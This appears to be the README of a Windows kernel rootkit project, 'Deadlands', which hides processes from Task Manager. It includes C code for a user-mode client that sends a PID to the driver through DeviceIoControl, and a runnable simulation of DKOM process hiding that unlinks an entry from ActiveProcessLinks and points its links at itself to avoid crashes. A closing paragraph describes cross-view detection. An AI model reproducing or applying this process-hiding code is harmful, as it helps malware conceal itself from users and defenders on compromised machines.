majdi / deadlands

:bomb: A simple kernel-level rootkit


Deadlands

Overview

A simple kernel-level rootkit.

Deadlands hides a process from Task Manager (taskmgr.exe): once a process such as cmd.exe has been hidden, it no longer appears in the process list. The project's user-mode component takes the PID of the process to hide and passes it to the driver through an IOCTL (DeviceIoControl).
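The user-mode half of that exchange, as an added example rather than the project's own client: it validates a PID from the command line, builds the request the README describes, and sends it to the driver with DeviceIoControl. The device path (`\\.\Deadlands`), the IOCTL number (vendor function code 0x800, METHOD_BUFFERED) and the one-field request layout are assumptions made for the example; a real client has to match whatever the driver registers. The Win32 calls compile only on Windows, the request encoding is plain C.

```c
/*
 * Added example, not Deadlands' own user-mode code.
 * Assumed protocol: a single 32-bit PID sent to \\.\Deadlands with a
 * METHOD_BUFFERED IOCTL whose function code is 0x800.
 */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* CTL_CODE exactly as the Windows SDK defines it (winioctl.h / ntddk.h). */
#define DL_CTL_CODE(DeviceType, Function, Method, Access)              \
    (((uint32_t)(DeviceType) << 16) | ((uint32_t)(Access) << 14) |     \
     ((uint32_t)(Function) << 2)    | (uint32_t)(Method))
#define DL_FILE_DEVICE_UNKNOWN 0x22u
#define DL_METHOD_BUFFERED     0u
#define DL_FILE_ANY_ACCESS     0u

/* Assumed: vendor-defined function codes start at 0x800. */
#define IOCTL_DEADLANDS_HIDE_PID \
    DL_CTL_CODE(DL_FILE_DEVICE_UNKNOWN, 0x800, DL_METHOD_BUFFERED, DL_FILE_ANY_ACCESS)

/* Assumed symbolic link created by the driver. */
#define DEADLANDS_DEVICE_PATH L"\\\\.\\Deadlands"

/* Assumed input-buffer layout shared with the driver. */
typedef struct { uint32_t pid; } HIDE_PID_REQUEST;

/* Returns the IOCTL number so the encoding can be checked independently. */
static uint32_t hide_pid_ioctl_code(void) { return IOCTL_DEADLANDS_HIDE_PID; }

/* Parses a decimal PID. Rejects signs, trailing garbage, zero and values that
 * do not fit in 32 bits, so a malformed PID never reaches the kernel.
 * Returns the PID, or 0 on failure (0 is never a valid target PID). */
static uint32_t parse_pid(const char *s) {
    if (!s || !isdigit((unsigned char)*s)) return 0;
    char *end = NULL;
    unsigned long long v = strtoull(s, &end, 10);
    if (*end != '\0' || v == 0 || v > 0xFFFFFFFFull) return 0;
    return (uint32_t)v;
}

#ifdef _WIN32
#include <windows.h>
/* Opens the device and sends the hide request. Returns 1 on success. */
static int send_hide_request(uint32_t pid) {
    HANDLE h = CreateFileW(DEADLANDS_DEVICE_PATH, GENERIC_READ | GENERIC_WRITE,
                           0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) {
        fprintf(stderr, "CreateFileW failed: %lu\n", GetLastError());
        return 0;
    }
    HIDE_PID_REQUEST req = { pid };
    DWORD returned = 0;
    BOOL ok = DeviceIoControl(h, IOCTL_DEADLANDS_HIDE_PID, &req, sizeof req,
                              NULL, 0, &returned, NULL);
    if (!ok) fprintf(stderr, "DeviceIoControl failed: %lu\n", GetLastError());
    CloseHandle(h);
    return ok ? 1 : 0;
}
#else
/* Non-Windows build: the protocol is encoded but there is no device to talk to. */
static int send_hide_request(uint32_t pid) {
    (void)pid;
    fprintf(stderr, "DeviceIoControl is Windows-only; request not sent\n");
    return 0;
}
#endif

int main(int argc, char **argv) {
    uint32_t pid = argc == 2 ? parse_pid(argv[1]) : 0;
    if (pid == 0) {
        fprintf(stderr, "usage: %s <pid>\n", argv[0]);
        return 2;
    }
    printf("IOCTL 0x%08X, hiding PID %u\n", hide_pid_ioctl_code(), pid);
    return send_hide_request(pid) ? 0 : 1;
}
```

The driver side of a METHOD_BUFFERED request reads the PID from the system buffer; it must check that the input length is at least `sizeof(HIDE_PID_REQUEST)` before touching it, and look the PID up (PsLookupProcessByProcessId, with the reference released afterwards) instead of trusting user mode to name a live process.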

Guidelines

The kernel code uses DKOM (Direct Kernel Object Manipulation) to hide the kernel structures that describe the process. Rather than hooking an API, DKOM edits live kernel data, so every enumeration path that walks the modified structure skips the process; the cost is that a wrong pointer write corrupts the kernel, and on 64-bit Windows Kernel Patch Protection (PatchGuard) treats the process list as a protected structure and bugchecks the system when it notices the change.
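To show what that manipulation looks like, here is an added user-mode simulation (not the Deadlands driver code) of the standard DKOM process-hiding step. Windows links every process's EPROCESS into a circular doubly linked list through its ActiveProcessLinks LIST_ENTRY, and the enumeration that Task Manager relies on (NtQuerySystemInformation with SystemProcessInformation) walks that list. The struct below stands in for EPROCESS: the field names are the real ones, the layout and the constructed four-process list are not, and everything is plain C that runs anywhere.

```c
/*
 * Added example, not Deadlands' own kernel code: DKOM process hiding,
 * simulated on a constructed list so it can run in user mode on any OS.
 */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;
    struct _LIST_ENTRY *Blink;
} LIST_ENTRY;

/* Stand-in for the kernel's EPROCESS; real offsets differ per Windows build,
 * which is why real drivers resolve them at runtime instead of hardcoding. */
typedef struct _FAKE_EPROCESS {
    uintptr_t  UniqueProcessId;
    LIST_ENTRY ActiveProcessLinks;
    char       ImageFileName[16];
} FAKE_EPROCESS;

/* Same macro the kernel uses to get from a LIST_ENTRY back to its container. */
#define CONTAINING_RECORD(addr, type, field) \
    ((type *)((char *)(addr) - offsetof(type, field)))

/* Plays the role of PsActiveProcessHead. */
static LIST_ENTRY    g_ActiveProcessHead;
static FAKE_EPROCESS g_procs[4];

static void insert_tail(LIST_ENTRY *head, LIST_ENTRY *e) {
    e->Flink = head;
    e->Blink = head->Blink;
    head->Blink->Flink = e;
    head->Blink = e;
}

/* Walks the list the way an enumerator does; NULL if pid is not reachable. */
static FAKE_EPROCESS *find_process(LIST_ENTRY *head, uintptr_t pid) {
    for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) {
        FAKE_EPROCESS *p = CONTAINING_RECORD(e, FAKE_EPROCESS, ActiveProcessLinks);
        if (p->UniqueProcessId == pid) return p;
    }
    return NULL;
}

static size_t count_processes(LIST_ENTRY *head) {
    size_t n = 0;
    for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) n++;
    return n;
}

/* The DKOM step. Neighbours are rewired past the entry, then the entry's own
 * Flink/Blink are pointed at itself: when the hidden process later exits and
 * the kernel calls RemoveEntryList on it, that unlink is a harmless no-op
 * instead of a write through stale pointers (a classic rootkit bugcheck).
 * Returns 1 if a process was hidden, 0 if pid was not on the list. */
static int hide_process(LIST_ENTRY *head, uintptr_t pid) {
    FAKE_EPROCESS *p = find_process(head, pid);
    if (!p) return 0;
    LIST_ENTRY *e = &p->ActiveProcessLinks;
    e->Blink->Flink = e->Flink;
    e->Flink->Blink = e->Blink;
    e->Flink = e;
    e->Blink = e;
    return 1;
}

/* Builds the constructed list (System, explorer.exe, cmd.exe, notepad.exe),
 * hides cmd.exe, and returns how many processes a list walk still sees. */
static size_t demo_hide_cmd(void) {
    static const uintptr_t pids[4]  = { 4, 1200, 4321, 5100 };
    static const char *const names[4] = { "System", "explorer.exe", "cmd.exe", "notepad.exe" };
    g_ActiveProcessHead.Flink = g_ActiveProcessHead.Blink = &g_ActiveProcessHead;
    for (int i = 0; i < 4; i++) {
        g_procs[i].UniqueProcessId = pids[i];
        strncpy(g_procs[i].ImageFileName, names[i], sizeof g_procs[i].ImageFileName - 1);
        g_procs[i].ImageFileName[sizeof g_procs[i].ImageFileName - 1] = '\0';
        insert_tail(&g_ActiveProcessHead, &g_procs[i].ActiveProcessLinks);
    }
    hide_process(&g_ActiveProcessHead, 4321);
    return count_processes(&g_ActiveProcessHead);
}

int main(void) {
    size_t before = 4, after = demo_hide_cmd();
    printf("visible processes: %zu before, %zu after hiding PID 4321\n", before, after);
    for (LIST_ENTRY *e = g_ActiveProcessHead.Flink; e != &g_ActiveProcessHead; e = e->Flink)
        printf("  %s\n", CONTAINING_RECORD(e, FAKE_EPROCESS, ActiveProcessLinks)->ImageFileName);
    return 0;
}
```

The hidden process keeps running because the scheduler works from threads, not from this list. That is also the detection angle: the EPROCESS is still reachable through other kernel views (its threads, the handle table, the PspCidTable PID table), so a cross-view comparison between the ActiveProcessLinks walk and one of those sources reveals exactly the PIDs a DKOM rootkit removed.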



Languages

C 63.5%, C# 20.8%, C++ 11.9%, Makefile 3.4%, Batchfile 0.4%